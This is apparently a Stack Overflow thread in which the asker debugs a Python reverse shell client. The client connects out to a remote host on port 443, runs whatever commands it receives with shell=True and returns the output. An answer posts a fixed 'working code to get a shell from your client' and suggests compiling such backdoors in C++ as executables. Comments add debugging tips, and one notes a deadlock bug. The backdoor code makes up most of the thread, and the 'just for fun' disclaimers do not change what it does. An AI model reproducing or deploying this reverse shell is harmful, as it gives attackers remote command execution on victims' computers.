0

/*

Hey, this script is purely for fun, not anything illegal, besides its easy to stop and detect. Further on if I were to use it for illegal activities, why would I post it here?

*/

My problem is that I am not able to execute cmd commands from the client. I am not sure why although I have a hint that it is to do with some kind of socket error. When I try to execute the command it just does nothing no matter how long I wait. It's nothing wrong with the client as I have tested it out with a simpler version of the code below.

import getpass
import socket
import subprocess
username = getpass.getuser()
host = socket.gethostbyname('IP here')
port = 443
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(3)
def start():
    conntrue = None
    while conntrue is None:
        try:
            conntrue = s.connect((host, port))
            s.send("[+] We are connected to %s") % (username)
            while True:
                try:
                    exec_code = s.recv(1024)
                    if exec_code == "quit":
                        break
                    elif exec_code == "Hey":
                        try:
                            proc = subprocess.Popen("MsgBox " + username + " Hey", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
                            stdout_value = proc.stdout.read() + proc.stderr.read()
                            s.send(stdout_value)
                        except:
                            s.send("[+] was wrong, just exec it manually")
                    else:
                        proc = subprocess.Popen(exec_code, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
                        stdout_value = proc.stdout.read() + proc.stderr.read()
                        s.send(stdout_value)
                except:
                    s.close()
        except:
            conntrue = None
            pass
    s.close()
start()
  • What does "not able to execute cmd commands from the client"? Why are you not able? Are you getting an error? Is it executing the wrong thing? Is the code crashing? – Bryan Oakley Oct 15 '15 at 11:41
  • 1
    unrelated: replace `stdout_value = proc.stdout.read() + proc.stderr.read()` with `output = b"".join(proc.communicate())` otherwise your child processes may hang if they expect input or if they generate enough output on stderr to fill the corresponding OS pipe buffer. – jfs Oct 15 '15 at 20:11
  • 1
    Your code is a nice illustration why you should not use a bare `except:` statement: it hides bugs in your code. Start by logging all exceptions that you get (and fixing corresponding bugs). – jfs Oct 15 '15 at 20:15
  • @J.F.Sebastian Thanks for that, used except Exception, e to find the mistake. I am not going to upload it in case some one uses this for anything illegal. –  Oct 17 '15 at 23:19
  • 1
    also, if you do nothing with the subprocess output then you could redirect it to the socket directly: `Popen(..., stdout=s, stderr=STDOUT)`, [example](http://stackoverflow.com/questions/19961052/what-is-the-difference-if-i-dont-use-stdout-subprocess-pipe-in-subprocess-popen/19961290#comment29713500_19961290). – jfs Nov 01 '15 at 18:35

1 Answers1

-2

Here you go,this is a working code to get a shell from your client. I doubt you will be able to use this anything illegal anyway, python is not for backdoors. You should consider C++ for this kind of code as not only is fast but it can be compiled into an exe. Whereas python requires the python interpreter and therefore cannot run on windows(unless you get py2exe). 

import getpass
import socket
import subprocess
username = getpass.getuser()
host = socket.gethostbyname('')
port = 443
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connection = None
while connection is None:
    try:
        connection = s.connect((host, port))
        s.send("[+] We are connected to %s" % username)
        while True:
            try:
                exec_code = s.recv(1024)
                if exec_code == "quit":
                    break
                else:
                    proc = subprocess.Popen(exec_code, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
                    stdout_value = proc.stdout.read() + proc.stderr.read()
                    s.send(stdout_value)
            except Exception, err:
                print err
    except Exception, e:
        print e
s.close()

Try not to use except by itself use except Exception,variable to find mistakes in code then replace with the bare except.

P.Andrews
  • 73
  • 1
  • 14
  • -1, causes a deadlock if the program being run writes to stderr (and blocks for that write to complete) before it writes to stdout. – Charles Duffy Mar 18 '21 at 17:57